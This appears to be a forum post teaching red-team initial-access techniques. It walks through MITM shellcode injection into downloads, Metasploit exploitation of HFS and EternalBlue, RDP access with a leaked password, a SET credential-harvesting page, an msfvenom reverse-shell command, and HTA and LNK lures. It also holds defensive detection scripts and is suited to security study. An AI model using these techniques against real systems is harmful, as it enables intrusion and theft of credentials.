
Pentest Red Team Techniques - Initial Access

dEEpEst


Red Team Techniques

Initial Access

The adversary is trying to get into your network.


Initial Access consists of techniques that use various entry vectors to gain an initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.
 

Content Injection​

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website, adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads and other data to already compromised systems.

Adversaries may inject content into victim systems in various ways, including:

  • From the middle, where the adversary is in between legitimate online client-server communications (Note: this is similar to but distinct from Adversary-in-the-Middle, which describes AiTM activity solely within an enterprise environment)

  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server
Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception

In this example I'll be working with the backdoor-factory injection caplet for Bettercap, rebuilt in Go. The tool looks for specific extensions and file formats so it can inject shellcode into compatible binary formats such as PE, Mach-O and ELF. In the following examples I will use a Linux (ELF) binary and a Windows (PE) binary, both of which will be injected with shellcode.

First we'll need to run backdoor-factory and give it the folder where our shellcode is located.

image

Since this folder is empty we'll need to create the shellcode for the intended OS. In this scenario we'll be building the shellcode for 64-bit Linux; I'll use msfvenom to create it.

image

We'll take a quick look at the caplet file to see what it's doing. The first line targets Linux machines; the second line searches for the specific User-Agents that Linux machines send when browsing the web; the third line looks for specific containers such as zip, tar, gunzip, etc. It will decompress these files on the fly if they are not password protected and then inject the shellcode into the ELF or PE binary.

image

Make sure you save the payload in the correct folder. As seen previously, I saved a 64-bit shellcode in the x64 folder and the caplet targets the correct formats, so with this I can continue with the instructions from backdoor-factory and execute the caplet.

image

Now, since the technique is specific about what it looks for, I set up an ELF binary that prints "Hello World". This binary was compressed into a ZIP file and hosted on an Apache server (I tried using Python's HTTP server but had no success; it only worked with dedicated HTTP servers). When Bettercap detects the specific User-Agent and the correct extension it will grab the file, inject the shellcode and send it back to the user, this time with our shellcode.

image

Now we'll grab the file.

image

In the screen above we see the intended ZIP file has been downloaded, and Bettercap has successfully identified it and injected the shellcode.

image

Now when the user tries to use this file by extracting and executing it, it will work as intended but with our backdoor installed.

image

For Windows it requires some small edits to the caplet file.

image

As seen previously, I've changed the target to Windows and set it to expect User-Agents that contain the string Windows. This is not 100% reliable, as the User-Agent can be spoofed, but we'll continue for now. I've again hosted a PE file on an Apache server.



image

I've initiated the attack in another window; notice the new target.

image

I'll proceed to download the PE file compressed in a ZIP container.

image

And the attack continues from Bettercap.

image

I can confirm this by extracting the contents of the ZIP file and executing it, as seen in the demo below.

image
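The injection above only works because the download travels over plaintext HTTP and nothing on the receiving side checks what arrived. The defender's counterpart, as an added example that is not part of the original post and not code from backdoor-factory or Bettercap, is to pin each archive member to a hash published out of band (and to serve over HTTPS so the middle cannot rewrite the stream). The archive, the manifest and the "tampering" below are all constructed in memory; verify_archive reports any member whose bytes no longer match.

```python
"""Verify a downloaded archive against hashes pinned out of band.

Added example for the content-injection demo; not part of the original post
and not code from backdoor-factory or Bettercap. The archive, the manifest
and the simulated tampering are all constructed in memory.
"""
import hashlib
import io
import zipfile

# Magic bytes of the executable formats the injection caplet targets.
MAGICS = {"ELF": b"\x7fELF", "PE": b"MZ", "Mach-O": b"\xcf\xfa\xed\xfe"}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_zip(members: dict) -> bytes:
    """Pack {name: bytes} into an in-memory ZIP (stand-in for the hosted file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def manifest_for(members: dict) -> dict:
    """The {name: sha256} list a publisher would ship beside the download."""
    return {name: sha256(data) for name, data in members.items()}


def detect_format(data: bytes):
    for fmt, magic in MAGICS.items():
        if data.startswith(magic):
            return fmt
    return None


def verify_archive(zip_bytes: bytes, manifest: dict) -> list:
    """Return a list of findings; an empty list means every member matches."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        for name in names:
            data = zf.read(name)
            expected = manifest.get(name)
            if expected is None:
                findings.append(f"{name}: not in manifest (unexpected member)")
            elif sha256(data) != expected:
                fmt = detect_format(data) or "non-executable"
                findings.append(f"{name}: hash mismatch ({fmt} member modified in transit)")
        for name in manifest:
            if name not in names:
                findings.append(f"{name}: missing from archive")
    return findings


# Constructed sample: a header-only "ELF" standing in for the Hello World binary.
ORIGINAL = {
    "hello": b"\x7fELF\x02\x01\x01" + b"\x00" * 57,
    "README": b"prints hello world\n",
}
MANIFEST = manifest_for(ORIGINAL)
CLEAN_ZIP = build_zip(ORIGINAL)
# Simulate the injector: same file name, extra bytes appended to the binary.
TAMPERED_ZIP = build_zip(dict(ORIGINAL, hello=ORIGINAL["hello"] + b"\x90" * 16))

if __name__ == "__main__":
    print("clean   :", verify_archive(CLEAN_ZIP, MANIFEST))
    print("tampered:", verify_archive(TAMPERED_ZIP, MANIFEST))
```

The manifest has to reach the client over a channel the injector cannot touch (an HTTPS page, a signed release note); a hash file served over the same plaintext HTTP channel can be rewritten along with the archive.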
 

Exploit Public-Facing Applications

Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet-accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.

If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can give an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.

 

Rejetto HTTP File Server (HFS) 2.3

You can use HFS (HTTP File Server) to send and receive files.

It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. It also differs from classic web servers because it's very easy to use and runs "right out-of-the-box". Access your remote files, over the network. It has been tested with Wine under Linux.

CVE-2014-6287

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HTTP Fileserver) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

Let's test it.

Recon

We will have an instance of HFS running on our victim host.

image

From our attacking machine we will do a simple nmap scan and check the open ports. We know the server is running on port 80, but as an attacker we usually go in blind (black box). We also don't want to flood it with too many requests, so we can always use nmap's safe scripts to check our victim host in a proper way. Let's cheat in this example and run the scan just on port 80.

image

Let's imagine that this is a public-facing IP address and we find our web server running HFS. Let's enumerate this service, as we are currently unaware whether there is even an exploit!

Google:

The first 3 searches show us some promising results.

image

Let's not go too far: Offensive Security has this incredible tool, searchsploit, to search for exploits locally on our machine with no internet.

image

What about the famous hacker framework, Metasploit?

We can start the tool by running: sudo msfdb init && sudo msfconsole

This will initialize the Metasploit database and start the framework. From here, searching for exploits is simple using the "search" command: search rejetto

image

A great option: we can use this tool to catch a shell immediately. We try to do this in the most efficient manner, so why not use a tool that has been properly tested (apologies to the manual hackers out there).

Exploit

With Metasploit we set the proper options to attack this machine and gain a shell. Usually we want to set the following variables:

    set RHOST <Target IP>
    set RPORT <Target Port>
    set LHOST <Attacker IP>
    set LPORT <Attacker Port>

The rest is set to the proper port and path. Then we simply run the payload.

image

And we can see our permissions on the machine. With Metasploit, try privesc and other good things on the machine. But this is just an example of how a public-facing application can give an APT initial access to the internal network when it faces the public internet.
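CVE-2014-6287 is triggered through HFS's search parameter, so a web-server or reverse-proxy access log is where a defender sees the attempt. The following is an added detection example, not part of the original post: it parses Common Log Format lines (the samples are constructed), decodes every query parameter and reports any whose value contains a NUL byte. It generalises beyond the page's case to every parameter and to a second decoding pass, because %2500 becomes %00 after one decode.

```python
"""Flag web requests that carry a null-byte (%00) sequence in a query parameter.

Added detection example, not part of the original post. Log lines below are
constructed; IPs come from documentation ranges.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# host ident user [time] "METHOD target PROTO" status ...
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def null_byte_params(target: str) -> list:
    """Names of query parameters whose decoded value contains a NUL byte."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl has already decoded one layer; unquote catches %2500 as well.
        if "\x00" in value or "\x00" in unquote(value):
            hits.append(name)
    return hits


def scan_log(lines) -> list:
    """Return one alert dict per request that carries a NUL in its query string."""
    alerts = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a request line we understand
        params = null_byte_params(m["target"])
        if params:
            alerts.append({"ip": m["ip"], "time": m["time"], "status": m["status"],
                           "params": params, "target": m["target"]})
    return alerts


# Constructed sample log lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /?search=%00abc HTTP/1.1" 200 188',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /?search=%2500abc HTTP/1.1" 200 188',
    '203.0.113.5 - - [10/Oct/2023:13:57:11 +0000] "GET /files/doc.pdf HTTP/1.1" 200 9021',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A hit with status 200 is more interesting than one with 4xx, since it means the server accepted the request; either way the fix for this particular bug is to move off the vulnerable 2.3x builds, and the log rule is there to tell you whether anyone tried before you did.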
 

External Remote Services

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.

Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as a redundant or persistent access mechanism during an operation.
 

SMB/Windows Admin Shares

Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares.

Windows systems have hidden network shares that are accessible only to Administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$ and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB, to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution.

Boy, is this one famous (WannaCry). This port is now uncommon but not dead; it is still facing the public internet (do your recon if you don't believe me). It is another common service offered by operating systems: it allows us to share files across the network with ease, but it also allows attackers to gain access to machines and even move laterally through the network! (More on that later.)

Recon

We start with our nmap scan to find the service running on the operating system. We are aware that the service runs on port 445, so we will focus on that one in our initial enumeration.

image

We see our port and service open and running. With some enumeration we can find that this service is vulnerable to the EternalBlue exploit. This was a very well-known vulnerability, developed by the NSA and leaked by the Shadow Brokers in 2017. It has been properly tested and developed in the Metasploit Framework (please do try to exploit it manually, as there are many exploits flying around on GitHub). We will use this to gain a shell and access to the machine.

But! Let's be honest: even though we are simulating an APT, let's be CAREFUL when using these exploits, as they are well known to crash servers. YES, YES, they have been tested and properly configured to work in the framework, but computers are so random that you don't even know if this will work. It is always best practice to replicate the environment in a virtual machine and TEST your exploits THERE!

We verify the variables set in Metasploit, execute the exploit and get a shell.

image

And it's SYSTEM access. This was another great example of services facing the public internet and how attackers can leverage these vulnerabilities to gain access to the network. With some proper enumeration and the correct tools we can find these vulnerabilities on the targeted machine and gain access to the PC.

Remember, even though this was a very dangerous vulnerability and it's not seen in the wild as often anymore, unfortunately it is still out there.
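Both this section and the RDP one that follows hinge on port 445 or 3389 being reachable from the public internet, which is exactly what an external nmap sweep of your own address ranges will show you. The following is an added example, not from the original post: it parses the "Ports:" records that nmap writes with -oG (the sample output is constructed) and flags admin-plane services on globally routable addresses. The port-to-service table is an assumption for illustration.

```python
"""Audit nmap grepable (-oG) output for admin services reachable from the internet.

Added example, not from the original post. ADMIN_PORTS is an assumed list;
the gnmap text is a constructed sample.
"""
import ipaddress
import re

ADMIN_PORTS = {445: "SMB", 3389: "RDP", 5985: "WinRM", 5986: "WinRM over TLS", 135: "MSRPC"}
# One -oG port record: port/state/proto/owner/service/rpcinfo/version/
PORT_FIELD = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//")


def parse_gnmap(text: str) -> dict:
    """Map host IP -> [(port, state, proto, service), ...] from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and "Status: Up" lines carry no ports
        ip = line.split()[1]
        ports_part = line.split("Ports:", 1)[1].split("\t")[0]
        hosts[ip] = [(int(p), state, proto, svc)
                     for p, state, proto, svc in PORT_FIELD.findall(ports_part)]
    return hosts


def exposed_admin_services(hosts: dict) -> list:
    """(ip, port, service, scope) for every open admin port; scope by routability."""
    findings = []
    for ip, ports in hosts.items():
        addr = ipaddress.ip_address(ip)
        for port, state, proto, svc in ports:
            if state == "open" and port in ADMIN_PORTS:
                scope = "INTERNET-EXPOSED" if addr.is_global else "internal"
                findings.append((ip, port, ADMIN_PORTS[port], scope))
    return findings


# Constructed sample. 11.22.33.44 stands in for a public address because the
# RFC 5737 documentation ranges are not reported as global by ipaddress.
SAMPLE_GNMAP = """# Nmap 7.94 scan initiated (constructed sample)
Host: 11.22.33.44 ()\tStatus: Up
Host: 11.22.33.44 ()\tPorts: 80/open/tcp//http///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (997)
Host: 10.0.0.5 ()\tPorts: 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (998)
"""

if __name__ == "__main__":
    for finding in exposed_admin_services(parse_gnmap(SAMPLE_GNMAP)):
        print(finding)
```

Run it against a scan taken from outside your perimeter; anything that comes back INTERNET-EXPOSED on 445 or 3389 is the entry point these two sections describe and should sit behind a VPN or gateway instead.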
 

RDP Service

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.

Sometimes we need to access our PC from a remote location due to situations that are out of our control, and Windows made it simple to allow RDP connections to our PC through the RDP service (Pro can enable it; Home only allows outbound connections). We will point our RDP service at a public IP address so that we can access our internal network from a remote location.

From a work perspective this is great; from an attacker's perspective it is even greater. The only thing that stops them is finding Valid Accounts that can give them access to the service. There are some public exploits, but they have a few requirements to be successful: some need a specific service to be running (UltraVNC, TightVNC, etc.), others need an older OS (Windows XP, Vista, 7).

Recon

Let's start with a simple nmap scan. These services run on specific ports (unless changed); RDP is known for running on port 3389, so we will focus our scan on this port and see what information we can grab from it.

image

We continue by searching for accounts or common passwords that can give us some access to this service. In this step we can use many techniques such as OSINT, phishing, leaked databases, etc. These will help us find users or credentials to try against the External Remote Services a company exposes to the public internet.

Exploitation

On this attack we won't be using any exploits; it consists mostly of having some Valid Accounts with RDP permissions or Administrator privileges, as these accounts are usually the ones allowed to connect remotely through RDP.

But in this example we did our recon and found some old credentials leaked in a previous database.

User: John

Password: P4$$W0rd123!

image

And finally, after some hard work, we manage to gain access through the RDP service that we found in our initial recon. This is another great example, not common but still out there, of a service that can give attackers access to the internal network.
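Windows records the logon above as Security event 4624 (success) or 4625 (failure) with LogonType 10 (RemoteInteractive), so that audit trail is where an old leaked password being tried against an exposed RDP service leaves its trace. The following is an added detection example, not from the original post: two rules run over a constructed event list, (1) a success from a source that produced FAIL_THRESHOLD or more failures inside WINDOW, and (2) any RemoteInteractive success from outside TRUSTED_NETS. The thresholds and the trusted ranges are assumptions.

```python
"""Spot leaked-credential use over RDP in Windows Security events.

Added example, not from the original post. Thresholds, trusted networks and
the event list are all assumed/constructed for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import ipaddress

TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
WINDOW = timedelta(minutes=10)
FAIL_THRESHOLD = 5
REMOTE_INTERACTIVE = 10  # LogonType for RDP sessions


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED_NETS)


def analyse(events) -> list:
    """events: dicts with EventID, LogonType, IpAddress, TargetUserName, time (ISO 8601)."""
    recent_failures = defaultdict(deque)  # source IP -> timestamps of recent 4625s
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev.get("LogonType") != REMOTE_INTERACTIVE:
            continue  # network/service logons are a different detection
        t = datetime.fromisoformat(ev["time"])
        src = ev["IpAddress"]
        q = recent_failures[src]
        while q and t - q[0] > WINDOW:
            q.popleft()  # slide the window forward
        if ev["EventID"] == 4625:
            q.append(t)
        elif ev["EventID"] == 4624:
            if len(q) >= FAIL_THRESHOLD:
                alerts.append(f"{src}: success for {ev['TargetUserName']} "
                              f"after {len(q)} failures within {WINDOW}")
            if is_external(src):
                alerts.append(f"{src}: external RDP logon as {ev['TargetUserName']}")
            q.clear()
    return alerts


def _ev(event_id, ip, user, time, logon_type=REMOTE_INTERACTIVE):
    return {"EventID": event_id, "LogonType": logon_type, "IpAddress": ip,
            "TargetUserName": user, "time": time}


# Constructed sample: six wrong guesses then a hit from an outside address,
# one clean internal logon, and one non-RDP failure that is out of scope.
SAMPLE_EVENTS = [
    _ev(4625, "11.22.33.44", "John", f"2023-10-10T12:0{i}:00") for i in range(6)
] + [
    _ev(4624, "11.22.33.44", "John", "2023-10-10T12:06:30"),
    _ev(4624, "10.0.0.8", "alice", "2023-10-10T12:07:00"),
    _ev(4625, "11.22.33.44", "John", "2023-10-10T12:08:00", logon_type=3),
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(alert)
```

The second rule fires on its own for a single clean logon from an unexpected network, which is the case where the attacker already has the right password and never produces a failure; that is why an exposed RDP service should also require MFA or sit behind a gateway.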
 

Phishing

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of Valid Accounts. Phishing may also be conducted via third-party services, like social media platforms.
 

Phishing: Spearphishing via Service

In this scenario, adversaries send messages through social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
 

Phishing: Spearphishing Link

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs a link to download malware rather than containing the malware in the email itself, to avoid defenses that may inspect email attachments.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.

It is a different form of spearphishing that employs links to download malware contained in the email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
 

Links: Social Engineering Toolkit

The Social-Engineering Toolkit (SET) is an open-source testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make believable attacks quickly. SET is a product of TrustedSec. This tool is great for phishing: it automates a lot of the process and provides us a link to send to the user.

There are some good frameworks, but we will use a well-known one which hasn't been updated in quite some time but still demonstrates the capability of capturing user credentials.

image

We follow the instructions to start a social engineering attack, then select the Credential Harvester attack and type the IP address the user has to connect back to, which of course hosts our login portal. Then we can simply send the link to the user.

image

The body of the email I am using for this technique.

Once the user clicks on the link they are sent to a login portal that looks like Google's.

image

And once they enter their credentials our machine will capture them for us.

image

Attacker Machine

image

We see our Captured Credentials in Red with a possible Username and Password Field found.

With this technique we can grab some valid accounts and try to use them with the other methods for Initial Access.
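The harvester above hands the operator a link to a bare IP address that serves a clone of a familiar login page, and that is what a mail gateway or an analyst should key on before anyone clicks. The following is an added example, not part of the original post and not code from SET: it parses a constructed .eml, pulls every anchor out of the HTML part and flags a bare-IP host, display text that names a different host than the real href, and plain http. The message, the addresses and the flag names are all assumptions for illustration.

```python
"""Triage the links in a phishing email before anyone clicks them.

Added example, not part of the original post and not code from SET. The .eml
below is constructed; 11.22.33.44 stands in for the harvester's address.
"""
import email
import ipaddress
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Hostname of a URL, or of bare text like 'www.example.com'."""
    return (urlsplit(url if "://" in url else "http://" + url).hostname or "").lower()


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_link(href: str, text: str) -> list:
    flags = []
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        flags.append("not-https")
    if is_ip(host):
        flags.append("bare-ip-host")
    # Only treat the anchor text as a claimed destination if it looks like one.
    shown = host_of(text) if ("." in text and " " not in text) else ""
    if shown and shown != host and not host.endswith("." + shown):
        flags.append(f"text-host-mismatch:{shown}!={host}")
    return flags


def triage_eml(raw: bytes) -> list:
    """[(href, text, flags)] for each link in the message's HTML part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    if body is None:
        return []
    parser = AnchorCollector()
    parser.feed(body.get_content())
    return [(href, text, assess_link(href, text)) for href, text in parser.links]


# Constructed sample message.
SAMPLE_EML = b"""From: IT Support <support@example.net>
To: john@example.com
Subject: Action required: verify your account
Content-Type: text/html; charset=utf-8

<html><body><p>Your session expired. Sign in again at
<a href="http://11.22.33.44/">https://accounts.google.com/signin</a>.</p>
<p>Our policy: <a href="https://www.example.com/policy">www.example.com</a></p>
</body></html>
"""

if __name__ == "__main__":
    for href, text, flags in triage_eml(SAMPLE_EML):
        print(href, "|", text, "|", flags or "clean")
```

The text-host-mismatch check is the one that catches the scenario on this page regardless of how the harvester is hosted: the lure has to show the user a name they trust, and that name is not where the href goes.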
 

Links: Binaries

The use of binaries has decreased a lot, but this is still a good example of how users download EXE files and give access to attackers. Remember, the weakest link is sometimes not a machine but the user.

I will demonstrate a simple chat-style email that contains a link to download the executable; that way it evades the email security measures that scan binaries. This will simply give the user a prompt to download or run the binary.

The use of msfvenom here is very simple, as this tool is widely known in the security industry, but it's also great for creating payloads fast. You can combine different methods of packaging, obfuscation or stripping to make your payload harder to detect. This attack could also be considered an Attachment, as I will put the link in a PDF file attached to the email, but the main attack vector will still be a link.

We'll create a simple binary payload using msfvenom:

    msfvenom --platform windows --arch x64 --payload windows/x64/shell/reverse_tcp LHOST=<YOUR IP> LPORT=<YOUR PORT> --format exe --out payload.ex
We can host this payload on a web server and send the full link in your phishing pretext: a simple email telling the user about the new game that just hit the stores.

image

(Don't worry I would've clicked it as well.)

Once they click the link the user will be prompted to download the payload, and from here it should be enough to have them run it.

image

In the following example I hosted the payload using Python's simple HTTP web server. You can start it with the following command: python3 -m http.server. Once we get the user to execute the payload we will receive a shell back on our machine.

image

A simple but very effective technique to get us a shell. You won't see this technique much anymore, or probably never, but it used to be very effective and successful.

We embedded a link in our email, had the user download a binary, and gained Execution.
 

Links: HTA Files

An HTML Application (HTA) is a Microsoft Windows program whose source consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.

In this example we'll assume that attachments are not allowed in our emails, so we will need to send the user a direct link, which will bypass any email security and let the user download our payload. This attack can also be used as an attachment, but we will skip attaching an HTA file and put it directly behind our link so the browser knows what to do once the link is clicked.

Example:

I wrote a simple script which automatically creates a simple HTA file that executes PowerShell code. It is very basic and will not bypass anything, but for this example let's assume we did our work and can bypass anything.

HTA File which will execute a PowerShell Command

image

By saving this file with an HTA extension we can send it to our target and have it executed. Remember, these techniques need User Execution/interaction, so the reason you give in your phishing email for why the file needs to be opened should be a good one.

We start a web server and add the link to our email, with the file included.

This can be considered an attachment phishing technique; the difference is that our attachment contains no code for execution, it just hosts our link. The target opens our file or email, which contains the link in its body. I put the body of this email in an attachment; if you have noticed, you can also use the attachment techniques to deliver links, as it's not that uncommon for PDF files or other types of documents to contain links as references to other things.

image

Once the target clicks on it they should receive prompts or warning messages, so we need a good excuse for the target to go through with executing it.

image

Once they click OK, the payload should execute with no issues on the target machine.

image

We see a warning on the Test.hta file that we try to execute; this needs to be downloaded and executed.

image

Then we successfully get a Reverse Shell on our Attacking Machine.

image

OK, OK, so you might be asking yourself: what's with ALL those warnings? Well, Windows got more efficient at detecting these attacks and knows the common extensions used in these payloads. It's efficient, but the techniques we are using here are very simple: they are not obfuscated, encrypted or using any advanced bypass method. Remember, these are just small examples of the most basic kind, and it's always good to research how you can create payloads that are harder to detect.
 

Phishing: Spearphishing Attachment

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.

There are many options for the attachment, such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

Mitigations

Antivirus/Antimalware

Anti-virus can also automatically quarantine suspicious files.

Network Intrusion Prevention

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.

Restrict Web-Based Content

As a best practice, block by default unknown or unused attachment types that should not be transmitted over email, such as .scr, .exe, .pif, .cpl, etc., to prevent some vectors.
 

Attachments: LNK Files

According to fileinfo.com:

An LNK file is a shortcut or "link" used by Windows as a reference to an original file, folder, or application similar to an alias on the Macintosh platform. It contains the shortcut target type, location, and filename as well as the program that opens the target file and an optional shortcut key.

It's simply a shortcut link, those icons you regularly see on your desktop. You can identify them by the curved arrow in the bottom left corner of the icon.

image

Let's check the properties on the Icon

image

It tells me where it's located and what binary is executed, with its full path included. What happens if I change the path?

Our icons have changed.

image

image

Can we fix this so we can confuse or trick the user? Of course: it's all in the settings, and we can apply the path of the specific icon we are looking for on the machine.

image

What happens when I execute this shortcut? It should point to our TEST file and open the text file.

image


This is also a good way to execute code: we can use PowerShell or any of the EXECUTION techniques mentioned to call our payload. It's not the stealthiest or most reliable, since it requires the user to interact with the file, but it's valuable to know it exists.
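A shortcut's icon, its window mode and its command line are separate fields in the MS-SHLLINK format, which is why the icon can be changed without touching the target; reading those fields back is how an analyst or a mail filter sees through the trick above. The following is an added example, not part of the original post: parse_lnk follows the ShellLinkHeader, skips the optional LinkTargetIDList and LinkInfo blocks and decodes the StringData fields, and triage applies two checks derived from this section (icon borrowed from a different program than the target; minimised launch with arguments). The two sample shortcuts are built in memory by build_lnk, a helper written for this example and not part of any real shortcut tooling.

```python
"""Read what a Windows shortcut (.lnk) really does, rather than what it shows.

Added example, not part of the original post. build_lnk and both sample
shortcuts are constructed here purely to exercise the parser.
"""
import struct

LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
LINK_FLAGS = ["HasLinkTargetIDList", "HasLinkInfo", "HasName", "HasRelativePath",
              "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode"]
# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = [("HasName", "name"), ("HasRelativePath", "relative_path"),
                 ("HasWorkingDir", "working_dir"), ("HasArguments", "arguments"),
                 ("HasIconLocation", "icon_location")]
SHOW_COMMAND = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}


def parse_lnk(data: bytes) -> dict:
    if data[:20] != LNK_MAGIC:
        raise ValueError("not a shell link file")
    link_flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    flags = {name: bool(link_flags >> bit & 1) for bit, name in enumerate(LINK_FLAGS)}
    off = 76  # fixed ShellLinkHeader size
    if flags["HasLinkTargetIDList"]:
        size, = struct.unpack_from("<H", data, off)
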